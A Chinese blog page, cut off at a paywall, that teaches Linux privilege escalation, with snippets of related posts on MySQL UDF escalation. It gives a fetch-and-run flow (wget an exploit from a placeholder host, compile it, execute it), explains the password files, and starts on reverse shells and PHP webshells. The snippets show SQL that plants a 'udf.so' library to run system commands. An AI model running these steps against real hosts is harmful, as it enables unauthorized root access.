linux下 udf提权_提权学习之旅——Linux操作系统提权

最新推荐文章于 2024-06-03 20:40:56 发布
最新推荐文章于 2024-06-03 20:40:56 发布
阅读量296 收藏 1
点赞数
文章标签: linux下 udf提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35779093/article/details/112527603
版权

更多全球网络安全资讯尽在邑安全

Linux提权基础

0x00:Linux提权方法

大致归纳总结如下:57d34406cac970574785e5507468f09f.png不过最核心也是最常见的提取方法还是内核提权,其他大多与程序员的配置有关,出现的几率不是很高。

0x01:Linux提权基础知识
uname -a查看内核版本id显示用户的ID,以及所属群组的IDpwd显示当前路径dpkg -lrpm -qa查看已经安装的程序cat /etc/issuecat /etc/*-release查看发行版

密码权限

大部分Linux系统的密码都和/etc/passwd/etc/shadow这两个配置文件有关,passwd里面储存的是用户shadow里面存储的是密码的hash值。出于安全考虑passwd是全用户可读,root可写的,而shadow是仅root可读写的。

/etc/passwdbf00b1c2d6fcb8f8544f91b855a04d51.pngpasswd由冒号分割,第一列是用户名,第二列是密码,x代表密码hash被放在shadow里面.

/etc/shadow51423203180a0110ac93714d0656bdad.pngshadow里面的就是密码的hash,但只有root权限才可以查看。

密码复用

另外需要注意的是很多管理员会重复使用密码,所以有可能数据库或者web后台的密码就是root密码。

提权常见的流程

  1. wget http://exp/exp.c

    下载exp文件

  2. gcc -o exp exp.c

    利用gcc进行编译操作,编译成二进制文件

  3. chmod +x exp

    将exp更改为可执行权限

  4. ./exp

运行exp进行提权
0x02:Linux反弹shell

Linux一般拿到shell,权限基本都很低,而且在菜刀或其他工具中执行命令没有交互过程(在菜刀等工具中,只是输入返回内容,如在菜刀中执行ssh等命令就不可行),所以需要通过反弹shell拥有一个交互式的shell

准备环境

ubuntu + apachekail 192.168.186.134ubuntu 192.168.186.152

上传进去一个php一句话木马,菜刀连接

最低0.47元/天 解锁文章
蓝洱
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
UDF提权linux
m0_66299232的博客
05-23 1314
secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下,此时也无法提权。大概就是将程序进行gcc编译,然后再登录mysql进行创建一个表,插入.so文件,创建自定义函数进行越权操作。#secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出,此时无法提权。#secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制,此时可提权
Linux提权(mysql UDF提权
waxcj的博客
12-16 2042
linux mysql数据库提权
CVE-2024-1086 Linux kernel nf_tables 本地提权漏洞修复方法--多种方式,亲测!!!
最新发布
qq_21160025的博客
06-03 8620
CVE-2024-1086 Linux kernel nf_tables 本地提权漏洞
vulnhub-raven_2-linux-udf提权
MIs_Jiangyaomin的博客
05-31 182
端口扫描:nmap -sS -sV -A -p 1-62235 192.168.136.144目录扫描:phpmailer版本。
linuxudf光盘权限问题,Linux技巧:自动挂载UDF光盘的方法介绍
weixin_29736061的博客
05-11 1403
简单的说,就是刻录的时候,如果有文件超过2G,用普通的刻录是不行的,必须使用 UDF 格式才能刻录,而 Ubuntu 默认自动挂载是挂不上的。原来都是自己手动用下列命令来挂载。sudo mount -t udf /dev/cdrom /media/cdrom不过为了省事,可以修改fstab文件来达到相同目的。sudo gedit /etc/fstab找到这么一句/dev/cdrom /media/...
linux环境下的MySQL UDF提权
黑战士的博客
04-25 1281
#1. 背景介绍###UDF(user defined function)用户自定义函数,是MySQL的一个扩展接口,称为用户自定义函数,是用来拓展MySQL的技术手段,用户通过自定义函数来实现在MySQL中无法实现的功能。文件后缀为.dll或.so,常用c语言编写。拿到一个WebShell之后,在利用操作系统本身存在的漏洞提权的时候发现补丁全部被修补。这个时候需要利用第三方应用提权。当MYSQL权限比较高的时候我们就可以利用udf提权。###利用前提mysqlfuncfunc。
udf提权_udf提权_udf.dll下载提权_mysql提权_ballsv6_提权_源码
10-04
mysql提权udf提权所需要的dll文件,有64位和32
mysql.zip_ROOT_mysql提权_udf_udf mysql_提权
09-19
提权用的 udf 得到root帐号可以用这个提权
Linux利用UDF库实现Mysql提权
09-10
4. **获取UDF库文件**:找到适用于当前操作系统(这里是Linux 64位)的UDF库文件,例如`lib_mysqludf_sys.so`。此文件可以在一些安全测试工具如sqlmap的资源中找到。 5. **加载UDF库**:将库文件的十六进制表示写入...
mysql udf提权文件
02-01
mysql udf提权文件mysql udf提权文件
lunix入侵别人电脑_记录一次Linux的实战入侵过程
weixin_34207964的博客
12-24 1326
注:本人是个菜鸟。一、利用文件上传漏洞获取webshell。确定要攻击的目标网站。图上的目标站域名过期了,只能通过ip地址访问。大概在去年的时候,对目标站实施了入侵,具体如下:本想着通过sql注入的方式方式爆出用户密码,通过sqlmap扫描注入发现没有注入点,但但得到了数据库是mysql。后来想着干脆自己去目标站注册一个账户。当然用户信息肯定是随便填的。登录成功之后发现我登录的用户有头像上传功能。...
mysql的udf提权复现
Shanfenglan's blog
03-09 1871
文章目录参考文章 参考文章 udf提权原理详解
vulnhub之mysql_udf提权
qq_36585338的博客
03-09 385
Linux 提权数据库MYSQL_UDF
linuxudf提权_udf提权
weixin_34862561的博客
01-14 997
0x00前言:udf提权是通过数据库来实现获取目标的管理员的shell,来达到从低权限提权到高权限0x01什么是udfudf(Userdefined function)是用户自定义函数在mysql中函数是什么,比如mysql中常见的sleep(),sum(),ascii()等都是函数udf就是为了让我们开发者能够自己写方便自己函数,它有3种返回值,这三种分别是STRING,INTEGER,REA...
linux mysql udf 提权
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
10-30 725
创建自定义函数STRING | INTEGER } SONAME '文件名';[]是可选项[AGGREATE]是聚集函数的表示,系统定义的聚集函数比如有COUNT()、AVE()、MN()、MAX()、SUM(){STRING|INTEGER|REAL} 是返回的类型 字符串,整型SONAME 'file'表示这个函数从哪个文件里面引入,而这个文件一般是动态链接库windows下是dll,linux是so,并且这个文件要在mysql的plugin目录下。
UDF提权复现
qq_51459600的博客
03-30 745
文章目录UDF提权复现环境搭建UDF提权原理提权过程 UDF提权复现 环境搭建 靶机:虚拟机Win7+phpstudy2018 ​ mysql5.5.53 ​ php5.2.17 攻击机:物理机 在已经得到webshell的情况下,利用mysqlUDF提权,在靶机WIn7上创建administrator权限的用户 UDF提权原理 条件:得到服务器webshell,知道数据库账号密码且可以远程连接 在udf.dll文件中,定义了名为sys_eval()的函数,该函数可以执行系统命令,通过该函数来完成系
mysql udf提权
weixin_60719780的博客
03-16 1057
udf提权只要是因为udf.dll文件,攻击者通过编写调用cmd或者shelludf.dkk文件,并且导入到一个指定的文件夹目录下,创建一个指向udf.dll的自定义函数,从而在数据库中的查询就等价于在cmd或者shell中执行命令。查询下的MySQL版本,这里我的是5.7.26,是大于5.1版本的,也就是说,我们需要找到lib\plugin这个目录,然后将我们的udf.dll文件写进去,其实这里的目录需要我们自己创建。前面做的是为了做铺垫,后面我们提权需要使用这个16进制的udf.dll文件;
权限提升:Mysql 数据库 .(UDF || 启动项 || 反弹)
网络安全领域___专研者.
04-29 1505
权限提升简称提权,由于操作系统都是多用户操作系统,用户之间都有权限控制,比如通过 Web 漏洞拿到的是 Web 进程的权限,往往 Web 服务都是以一个权限很低的账号启动的,因此通过 Webshell 进行一些操作会受到限制,这就需要将其提升为管理甚至是 System 权限。通常通过操作系统漏洞或操作系统的错误配置进行提权,也可以通过第三方软件服务,如数据库或 FTP 等软件的漏洞进行提权
linux udf提权
09-11
Linux中,通过使用UDF(用户定义函数)来提权是可能的。UDF是一种在MySQL中执行特定功能的自定义函数。为了在Linux中使用UDF提权,你需要执行以下步骤: 1. 首先,创建一个函数库文件(.so文件),并将其加载到MySQL中。可以使用以下命令创建函数库文件: ``` create function do_system returns integer soname 'udf.so'; ``` 这个命令会创建一个名为do_system的函数,该函数将执行系统命令。 2. 接下来,将函数库文件导入到MySQL的插件目录中。可以使用以下命令将文件导入到指定目录: ``` select * from foo into dumpfile '/usr/lib/mysql/plugin/udf.so'; ``` 这个命令将函数库文件导入到/usr/lib/mysql/plugin/目录中,这是MySQL插件的默认位置。 3. 在完成上述步骤后,你需要确保MySQL的安全设置允许UDF提权。可以通过执行以下命令来检查相关的MySQL变量: ``` show global variables like '%secure_file_priv%'; show variables like '%secure%'; ``` 你需要确保secure_file_priv变量没有设置为NULL,或者设置为函数库文件所在的目录。如果secure_file_priv的值为NULL,则导入和导出操作将被限制,无法进行提权。如果secure_file_priv的值为/tmp/,则导入和导出操作将被限制为/tmp/目录。只有当secure_file_priv的值没有具体值时,才可以进行提权操作。 4. 最后,使用以下命令查看插件的位置: ``` show variables like '%plugin%'; ``` 确保函数库文件被正确地导入到插件目录中。 通过执行以上步骤,你可以在Linux中使用UDF来实现提权。请注意,UDF提权可能存在安全风险,请谨慎操作,并确保只在必要时使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值